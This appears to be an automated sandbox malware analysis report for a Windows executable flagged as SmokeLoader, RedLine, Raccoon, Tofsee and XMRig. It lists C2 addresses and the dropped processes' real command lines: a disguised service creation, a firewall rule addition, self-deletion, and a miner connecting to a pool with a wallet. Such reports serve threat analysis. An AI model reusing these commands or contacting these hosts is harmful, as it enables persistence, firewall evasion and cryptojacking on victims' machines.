Overview

overview

10

Static

static

4c8981a973...a5.exe

windows7_x64

10

4c8981a973...a5.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    29-09-2021 18:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4c8981a97340a3fda39eed92155fa9a5.exe

  • Size

    222KB

  • MD5

    4c8981a97340a3fda39eed92155fa9a5

  • SHA1

    177e5559c59ee4896a45f43e1601fe91a41cc14d

  • SHA256

    44e29e5cd002e8d4d4f13432847f38fa79a1667b5fdef9b9f316c3501f3bb480

  • SHA512

    89f416c061f90de80f72575adb05560f5a82d6b4e2e48b6bce0f22fdbf43576c4bb3508e56cf6cda2f1431504cea0529855a4f2f60c97be5ae4890d724721752

Score
10/10
raccoonredlinesmokeloadertofseexmrig5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4backdoordiscoveryevasioninfostealerminerpersistencespywarestealertrojan

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://fiskahlilian16.top/

http://paishancho17.top/

http://ydiannetter18.top/

http://azarehanelle19.top/

http://quericeriant20.top/
rc4.i32
rc4.i32

Extracted

Family

redline

C2

92.246.89.6:38437

Extracted

Family

raccoon

Botnet

5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4

Attributes
  • url4cnc

    https://t.me/agrybirdsgamerept

rc4.plain
rc4.plain

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 3 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 11 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 18 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 13 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 8 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4c8981a97340a3fda39eed92155fa9a5.exe
    "C:\Users\Admin\AppData\Local\Temp\4c8981a97340a3fda39eed92155fa9a5.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3620
    • C:\Users\Admin\AppData\Local\Temp\4c8981a97340a3fda39eed92155fa9a5.exe
      "C:\Users\Admin\AppData\Local\Temp\4c8981a97340a3fda39eed92155fa9a5.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:3652
  • C:\Users\Admin\AppData\Local\Temp\EBBD.exe
    C:\Users\Admin\AppData\Local\Temp\EBBD.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2756
    • C:\Users\Admin\AppData\Local\Temp\EBBD.exe
      C:\Users\Admin\AppData\Local\Temp\EBBD.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:4068
  • C:\Users\Admin\AppData\Local\Temp\F479.exe
    C:\Users\Admin\AppData\Local\Temp\F479.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4284
    • C:\Users\Admin\AppData\Local\Temp\F479.exe
      C:\Users\Admin\AppData\Local\Temp\F479.exe
      2⤵
      • Executes dropped EXE
      PID:3964
  • C:\Users\Admin\AppData\Local\Temp\12C0.exe
    C:\Users\Admin\AppData\Local\Temp\12C0.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Users\Admin\AppData\Roaming\12C0.exe
      "C:\Users\Admin\AppData\Roaming\12C0.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3168
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Self.bat" "
        3⤵
          PID:5040
          • C:\Windows\SysWOW64\chcp.com
            chcp 1251
            4⤵
              PID:4740
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Roaming\12C0.exe
            3⤵
              PID:3428
              • C:\Windows\SysWOW64\choice.exe
                choice /C Y /N /D Y /T 0
                4⤵
                  PID:3620
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Self.bat" "
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3864
              • C:\Windows\SysWOW64\chcp.com
                chcp 1251
                3⤵
                  PID:4148
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 0 &Del 12C0.exe
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1000
                • C:\Windows\SysWOW64\choice.exe
                  choice /C Y /N /D Y /T 0
                  3⤵
                    PID:1120
              • C:\Users\Admin\AppData\Local\Temp\2426.exe
                C:\Users\Admin\AppData\Local\Temp\2426.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:652
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\frofodvu\
                  2⤵
                    PID:1776
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\uscaaqzp.exe" C:\Windows\SysWOW64\frofodvu\
                    2⤵
                      PID:1580
                    • C:\Windows\SysWOW64\sc.exe
                      "C:\Windows\System32\sc.exe" create frofodvu binPath= "C:\Windows\SysWOW64\frofodvu\uscaaqzp.exe /d\"C:\Users\Admin\AppData\Local\Temp\2426.exe\"" type= own start= auto DisplayName= "wifi support"
                      2⤵
                        PID:2620
                      • C:\Windows\SysWOW64\sc.exe
                        "C:\Windows\System32\sc.exe" description frofodvu "wifi internet conection"
                        2⤵
                          PID:2656
                        • C:\Windows\SysWOW64\sc.exe
                          "C:\Windows\System32\sc.exe" start frofodvu
                          2⤵
                            PID:2680
                          • C:\Windows\SysWOW64\netsh.exe
                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                            2⤵
                              PID:4968
                          • C:\Windows\SysWOW64\frofodvu\uscaaqzp.exe
                            C:\Windows\SysWOW64\frofodvu\uscaaqzp.exe /d"C:\Users\Admin\AppData\Local\Temp\2426.exe"
                            1⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:4212
                            • C:\Windows\SysWOW64\svchost.exe
                              svchost.exe
                              2⤵
                              • Drops file in System32 directory
                              • Suspicious use of SetThreadContext
                              • Modifies data under HKEY_USERS
                              PID:4916
                              • C:\Windows\SysWOW64\svchost.exe
                                svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                3⤵
                                  PID:2644
                            • C:\Users\Admin\AppData\Local\Temp\428C.exe
                              C:\Users\Admin\AppData\Local\Temp\428C.exe
                              1⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Enumerates connected drives
                              • Modifies system certificate store
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5072
                              • C:\Windows\SysWOW64\msiexec.exe
                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management 1.7.3.2\install\97C955F\adv.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\428C.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632939261 " AI_EUIMSI=""
                                2⤵
                                • Enumerates connected drives
                                • Suspicious use of FindShellTrayWindow
                                PID:3020
                            • C:\Windows\system32\msiexec.exe
                              C:\Windows\system32\msiexec.exe /V
                              1⤵
                              • Enumerates connected drives
                              • Drops file in Windows directory
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5052
                              • C:\Windows\syswow64\MsiExec.exe
                                C:\Windows\syswow64\MsiExec.exe -Embedding C8311BF09E5B25BA3FB3457E707E4563 C
                                2⤵
                                • Loads dropped DLL
                                PID:4288
                              • C:\Windows\syswow64\MsiExec.exe
                                C:\Windows\syswow64\MsiExec.exe -Embedding 48BB200DD0B508864E50617F237C4F25
                                2⤵
                                • Loads dropped DLL
                                PID:4036
                              • C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe
                                "C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe"
                                2⤵
                                • Executes dropped EXE
                                • Drops startup file
                                • Loads dropped DLL
                                PID:4520
                            • C:\Users\Admin\AppData\Local\Temp\4F6E.exe
                              C:\Users\Admin\AppData\Local\Temp\4F6E.exe
                              1⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:3476
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\4F6E.exe"
                                2⤵
                                  PID:1504
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /T 10 /NOBREAK
                                    3⤵
                                    • Delays execution with timeout.exe
                                    PID:1820

                              Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • memory/652-180-0x0000000000450000-0x00000000004FE000-memory.dmp

                                Filesize

                                696KB

                                Download

                              • memory/652-181-0x0000000000400000-0x0000000000448000-memory.dmp

                                Filesize

                                288KB

                                Download

                              • memory/1688-155-0x0000000004BD0000-0x0000000004BD1000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/1688-156-0x0000000005740000-0x0000000005741000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/1688-154-0x00000000007A0000-0x00000000007A1000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/1688-153-0x0000000004AF0000-0x0000000004B41000-memory.dmp

                                Filesize

                                324KB

                                Download

                              • memory/1688-151-0x0000000000270000-0x0000000000271000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/2644-265-0x0000000000A80000-0x0000000000B71000-memory.dmp

                                Filesize

                                964KB

                                Download

                              • memory/2644-270-0x0000000000A80000-0x0000000000B71000-memory.dmp

                                Filesize

                                964KB

                                Download

                              • memory/2756-133-0x0000000000450000-0x00000000004FE000-memory.dmp

                                Filesize

                                696KB

                                Download

                              • memory/3040-147-0x0000000001460000-0x0000000001475000-memory.dmp

                                Filesize

                                84KB

                                Download

                              • memory/3040-118-0x00000000013A0000-0x00000000013B5000-memory.dmp

                                Filesize

                                84KB

                                Download

                              • memory/3168-176-0x0000000006760000-0x0000000006761000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/3168-167-0x0000000002A20000-0x0000000002A21000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/3168-174-0x0000000006670000-0x0000000006671000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/3168-186-0x0000000006900000-0x000000000692A000-memory.dmp

                                Filesize

                                168KB

                                Download

                              • memory/3476-259-0x0000000001FA0000-0x0000000002030000-memory.dmp

                                Filesize

                                576KB

                                Download

                              • memory/3476-260-0x0000000000400000-0x0000000000493000-memory.dmp

                                Filesize

                                588KB

                                Download

                              • memory/3620-117-0x0000000000580000-0x00000000006CA000-memory.dmp

                                Filesize

                                1.3MB

                                Download

                              • memory/3652-115-0x0000000000400000-0x0000000000409000-memory.dmp

                                Filesize

                                36KB

                                Download

                              • memory/3964-142-0x0000000002C50000-0x0000000002C51000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/3964-146-0x0000000002C80000-0x0000000002C81000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/3964-143-0x00000000052D0000-0x00000000052D1000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/3964-145-0x0000000002E20000-0x0000000002E21000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/3964-141-0x00000000057D0000-0x00000000057D1000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/3964-135-0x0000000000400000-0x0000000000422000-memory.dmp

                                Filesize

                                136KB

                                Download

                              • memory/3964-144-0x0000000002DE0000-0x0000000002DE1000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/4212-200-0x0000000000530000-0x0000000000543000-memory.dmp

                                Filesize

                                76KB

                                Download

                              • memory/4212-201-0x0000000000400000-0x0000000000448000-memory.dmp

                                Filesize

                                288KB

                                Download

                              • memory/4284-134-0x0000000005BD0000-0x0000000005BD1000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/4284-132-0x00000000056C0000-0x00000000056C1000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/4284-128-0x00000000054A0000-0x00000000054A1000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/4284-125-0x0000000000CC0000-0x0000000000CC1000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/4284-127-0x0000000005500000-0x0000000005501000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/4916-196-0x0000000000B40000-0x0000000000B55000-memory.dmp

                                Filesize

                                84KB

                                Download